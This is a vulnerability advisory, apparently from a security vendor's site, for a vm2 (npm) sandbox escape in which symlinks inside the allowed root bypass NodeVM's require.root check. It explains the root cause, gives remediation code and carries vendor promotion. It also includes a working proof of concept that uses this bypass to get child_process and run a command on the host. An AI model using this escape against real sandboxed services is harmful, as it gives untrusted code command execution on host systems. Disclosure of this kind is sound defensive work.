CVE-2026-43998

CVE-2026-43998 is a high-severity security vulnerability in vm2 (npm), affecting versions = 3.10.5. It is fixed in 3.11.0.

Summary

NodeVM's require.root path restriction can be bypassed using filesystem symlinks, allowing sandboxed code to load modules from outside the allowed root directory in host context. Because path validation uses path.resolve() (which does not dereference symlinks) but module loading uses Node's native require() (which does), an attacker can load arbitrary host-realm modules and achieve remote code execution.

Severity

High (CVSS 3.1: 8.5)

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

  • Attack Vector: Network, sandboxed code is typically received from external sources (user-submitted scripts, plugin code)
  • Attack Complexity: High, requires symlinks inside the allowed root that point outside it; common with pnpm, npm workspaces, and npm link but not guaranteed in all deployments
  • Privileges Required: Low, attacker needs only the ability to submit code to the sandbox, which is the intended use case
  • User Interaction: None
  • Scope: Changed, the vulnerability is in the sandbox boundary; impact is on the host system
  • Confidentiality Impact: High, arbitrary file read via host command execution
  • Integrity Impact: High, arbitrary command execution on the host
  • Availability Impact: High, arbitrary command execution on the host

Affected Component

  • lib/resolver-compat.js, CustomResolver.isPathAllowed() (line 53-60)
  • lib/resolver-compat.js, CustomResolver.loadJS() (line 62-66)
  • lib/filesystem.js, DefaultFileSystem.resolve() (line 8-10)

CWE

  • CWE-59: Improper Link Resolution Before File Access

Description

Root Cause: Check/Use Path Discrepancy

The isPathAllowed method validates whether a resolved filename falls within the allowed root paths using a string-prefix check:

// lib/resolver-compat.js:53-60
isPathAllowed(filename) {
    return this.rootPaths === undefined || this.rootPaths.some(path => {
        if (!filename.startsWith(path)) return false;
        const len = path.length;
        if (filename.length === len || (len > 0 && this.fs.isSeparator(path[len-1]))) return true;
        return this.fs.isSeparator(filename[len]);
    });
}

The filename passed to this check is resolved via DefaultFileSystem.resolve(), which uses path.resolve():

// lib/filesystem.js:8-10
resolve(path) {
    return pa.resolve(path);
}

path.resolve() normalizes the path (resolves ., .., and makes it absolute) but does NOT dereference symlinks. A symlink at /root/node_modules/safe pointing to /outside/root/malicious resolves to /root/node_modules/safe, passing the prefix check.

However, the actual module loading uses Node's native require(), which does follow symlinks:

// lib/resolver-compat.js:62-66
loadJS(vm, mod, filename) {
    if (this.pathContext(filename, 'js') !== 'host') return super.loadJS(vm, mod, filename);
    const m = this.hostRequire(filename);
    mod.exports = vm.readonly(m);
}

No Symlink Defenses Exist

A search for realpath, readlink, lstat, or any symlink-aware function across the entire lib/ directory returns zero results. Neither DefaultFileSystem nor VMFileSystem provides a realpath method. The root paths themselves are also resolved without dereferencing symlinks:

// lib/resolver-compat.js:218
const checkedRootPaths = rootPaths ? (Array.isArray(rootPaths) ? rootPaths : [rootPaths]).map(f => fsOpt.resolve(f)) : undefined;

Full Execution Chain

  1. Host creates NodeVM with require: { external: ['safe'], root: '/tmp/root', context: 'host' }
  2. A symlink exists: /tmp/root/node_modules/safe/outside/root/vm2/ (e.g., via pnpm, npm link, or workspaces)
  3. Sandbox code calls require('safe')
  4. DefaultResolver.resolveFull() resolves to /tmp/root/node_modules/safe/index.js
  5. tryFile() calls this.fs.resolve(x)path.resolve()/tmp/root/node_modules/safe/index.js (symlink NOT followed)
  6. isPathAllowed() checks if path starts with /tmp/root/PASSES
  7. loadJS() detects context: 'host', calls this.hostRequire(filename)
  8. Node's require() follows the symlink, loads from /outside/root/vm2/index.js
  9. Module executes in host realm; exports proxied to sandbox
  10. Sandbox uses loaded module to escalate (e.g., creates a new privileged NodeVM with child_process)

Proof of Concept

const path = require('path');
const fs = require('fs');
const os = require('os');
const { NodeVM } = require('vm2');

// Create an "allowed" root directory
const root = fs.mkdtempSync(path.join(os.tmpdir(), 'vm2-root-'));
fs.mkdirSync(path.join(root, 'node_modules'), { recursive: true });

// Symlink inside root pointing to vm2 package outside root
// In real deployments: pnpm, npm link, workspaces create these automatically
const link = path.join(root, 'node_modules', 'safe');
fs.symlinkSync(path.resolve(__dirname), link, 'dir');

const vm = new NodeVM({
  require: {
    external: ['safe'],
    root,
    context: 'host',
    builtin: [],       // no builtins allowed
  },
});

// Sandbox code loads vm2 from outside root via symlink,
// creates a privileged inner NodeVM to get child_process
const out = vm.run(`
  const { NodeVM } = require('safe');
  const inner = new NodeVM({ require: { builtin: ['child_process'] } });
  module.exports = inner.run(
    "module.exports = require('child_process').execSync('id').toString()",
    'inner.js'
  );
`, path.join(root, 'vm.js'));

console.log(out.trim()); // prints host uid/gid, RCE achieved

Recommended Remediation

Option 1: Dereference symlinks with fs.realpathSync before path validation (Preferred)

Resolve symlinks before checking against root paths, so the validation operates on the actual filesystem location:

// lib/filesystem.js, add a realpath method
const fs = require('fs');

class DefaultFileSystem {
    resolve(path) {
        return pa.resolve(path);
    }

    realpath(path) {
        return fs.realpathSync(path);
    }
    // ... rest unchanged
}
// lib/resolver-compat.js, use realpath in isPathAllowed or before calling it
isPathAllowed(filename) {
    let realFilename;
    try {
        realFilename = this.fs.realpath(filename);
    } catch (e) {
        return false; // file doesn't exist or can't be resolved
    }
    return this.rootPaths === undefined || this.rootPaths.some(path => {
        if (!realFilename.startsWith(path)) return false;
        const len = path.length;
        if (realFilename.length === len || (len > 0 && this.fs.isSeparator(path[len-1]))) return true;
        return this.fs.isSeparator(realFilename[len]);
    });
}

Also dereference root paths at construction time:

// lib/resolver-compat.js:218
const checkedRootPaths = rootPaths ? (Array.isArray(rootPaths) ? rootPaths : [rootPaths]).map(f => {
    const resolved = fsOpt.resolve(f);
    try { return fs.realpathSync(resolved); } catch (e) { return resolved; }
}) : undefined;

Tradeoff: realpathSync adds a syscall per path check. Cache results to minimize overhead.

Option 2: Validate the realpath in makeExtensionHandler / checkAccess

Add a realpath check at the enforcement point in Resolver.makeExtensionHandler:

makeExtensionHandler(vm, name) {
    return (mod, filename) => {
        filename = this.fs.resolve(filename);
        // Dereference symlinks before access check
        try {
            const realFilename = fs.realpathSync(filename);
            if (realFilename !== filename) {
                // Filename was a symlink, validate the real path too
                this.checkAccess(mod, realFilename);
            }
        } catch (e) {
            throw new VMError(`Access denied to require '${filename}'`, 'EDENIED');
        }
        this.checkAccess(mod, filename);
        this[name](vm, mod, filename);
    };
}

Tradeoff: Fixes it at a higher layer but doesn't protect custom resolvers that bypass makeExtensionHandler.

Credit

This vulnerability was discovered and reported by bugbunny.ai.

Impact

  • Sandbox escape: Untrusted sandboxed code can load arbitrary modules from outside the allowed root directory in host context.
  • Remote code execution: By loading vm2 itself (or any module with dangerous capabilities), the attacker can execute arbitrary commands on the host system.
  • Bypasses require.root entirely: The root restriction, the primary defense against module loading attacks, provides no protection when symlinks are present.
  • Common in production: pnpm (where ALL node_modules are symlinks), npm workspaces, and npm link all create the symlink conditions required for exploitation.
  • Silent failure: No error or warning is raised when a symlink traverses outside the root.

CVE-2026-43998 has a CVSS score of 8.5 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.11.0); upgrading removes the vulnerable code path.

Affected versions

vm2 (= 3.10.5)

Security releases

vm2 → 3.11.0 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade vm2 to 3.11.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-43998? CVE-2026-43998 is a high-severity security vulnerability in vm2 (npm), affecting versions = 3.10.5. It is fixed in 3.11.0.
  2. How severe is CVE-2026-43998? CVE-2026-43998 has a CVSS score of 8.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of vm2 are affected by CVE-2026-43998? vm2 (npm) versions = 3.10.5 is affected.
  4. Is there a fix for CVE-2026-43998? Yes. CVE-2026-43998 is fixed in 3.11.0. Upgrade to this version or later.
  5. Is CVE-2026-43998 exploitable, and should I be worried? Whether CVE-2026-43998 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-43998 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-43998? Upgrade vm2 to 3.11.0 or later.

Other vulnerabilities in vm2

CVE-2026-47141CVE-2026-47139CVE-2026-47140CVE-2026-47210CVE-2026-47137

Stop the waste.
Protect your environment with Kodem.